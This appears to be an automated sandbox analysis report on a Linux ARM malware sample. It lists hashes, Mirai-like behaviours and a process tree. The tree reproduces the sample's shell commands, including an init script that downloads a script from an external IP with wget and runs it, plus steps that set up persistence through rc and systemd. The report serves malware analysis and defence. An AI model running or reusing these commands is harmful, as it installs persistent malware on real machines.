Analysis

  • max time kernel
    149s
  • max time network
    191s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    25/11/2024, 03:03

General

  • Target

    dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf

  • Size

    193KB

  • MD5

    4a92b4798caba7746c21f0f809a41089

  • SHA1

    4958a347e371034b4740d46179e9edc0b1b01247

  • SHA256

    dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a

  • SHA512

    41a6d5a2e318f49b238690606556cfe1f9d11c6bdaf41c844dd75732dccf40c0a0b4705892ee5924364379a990bf601b90df0296206358d8f761b63ddd54ea9e

  • SSDEEP

    6144:e56CMC0WSGLa2jIyfJkDMgBH+y2bpM/9BRKeumqwQjy/:xCVSGLa+IyfJkDMXh+/Qjmqljy/

Malware Config

Signatures

  • Contacts a large (22823) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Checks mountinfo of local process 1 TTPs 1 IoCs

    Checks mountinfo of running processes which indicate if it is running in chroot jail.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 3 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf
    /tmp/dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf
    1⤵
    • Modifies Watchdog functionality
    • Checks mountinfo of local process
    • Creates/modifies environment variables
    • Modifies init.d
    • Modifies rc script
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    • Reads runtime system information
    PID:652
    • /bin/sh
      /bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:656
      • /bin/systemctl
        systemctl enable custom.service
        3⤵
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:665
    • /bin/sh
      /bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      2⤵
      • File and Directory Permissions Modification
      PID:676
      • /bin/chmod
        chmod +x /etc/init.d/system
        3⤵
        • File and Directory Permissions Modification
        PID:678
    • /bin/sh
      /bin/sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"
      2⤵
      • File and Directory Permissions Modification
      • Modifies init.d
      PID:681
    • /bin/sh
      /bin/sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      2⤵
      • File and Directory Permissions Modification
      PID:684
      • /bin/chmod
        chmod +x /etc/init.d/sh
        3⤵
        • File and Directory Permissions Modification
        PID:686
    • /bin/sh
      /bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:688
      • /bin/mkdir
        mkdir -p /etc/rc.d
        3⤵
          PID:690
      • /bin/sh
        /bin/sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
        2⤵
        • Command and Scripting Interpreter: Unix Shell
        PID:693
        • /bin/ln
          ln -s /etc/init.d/sh /etc/rc.d/S99sh
          3⤵
            PID:694

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /boot/bootcmd

              Filesize

              109B

              MD5

              735cae7d3cbab0f59d95f84790282103

              SHA1

              1cb77931b3097f18988016c9ceba3280a5ccb2ae

              SHA256

              dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b

              SHA512

              998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

            • /etc/init.d/sh

              Filesize

              368B

              MD5

              5d64a6c10d95746b321d88f8283565ee

              SHA1

              92aeb5d86b84b38a10fa74ae7ee12333b7f58b44

              SHA256

              0ca8dcdeb338f978ce9703ff074d898dd8223859accb381d849fb180b96f7582

              SHA512

              b299a27118ffd3891d707156a09dfd3d8671a884134c1e997ce13feccd5c5547c77c737dff4b7f425a50871918ad92744d635916551b0752663dd0578af5dcce

            • /etc/init.d/system

              Filesize

              96B

              MD5

              f000251d92c773cc3ee1ca22cf5f0788

              SHA1

              e2386fe6a5f29b1e9e5ad5b38928c024f97105e6

              SHA256

              31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985

              SHA512

              0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

            • /etc/inittab

              Filesize

              101B

              MD5

              3d6b6e1b05ad5d0538ccd8804bcd279b

              SHA1

              0fc061b51c225d5bea072c939de05e8a856558bc

              SHA256

              cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5

              SHA512

              1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

            • /etc/systemd/system/custom.service

              Filesize

              290B

              MD5

              19a440fdac7f578f2fb33719698a082c

              SHA1

              ebadce21c65d05ad62a324deb39c57aecd3edf2c

              SHA256

              b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69

              SHA512

              8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb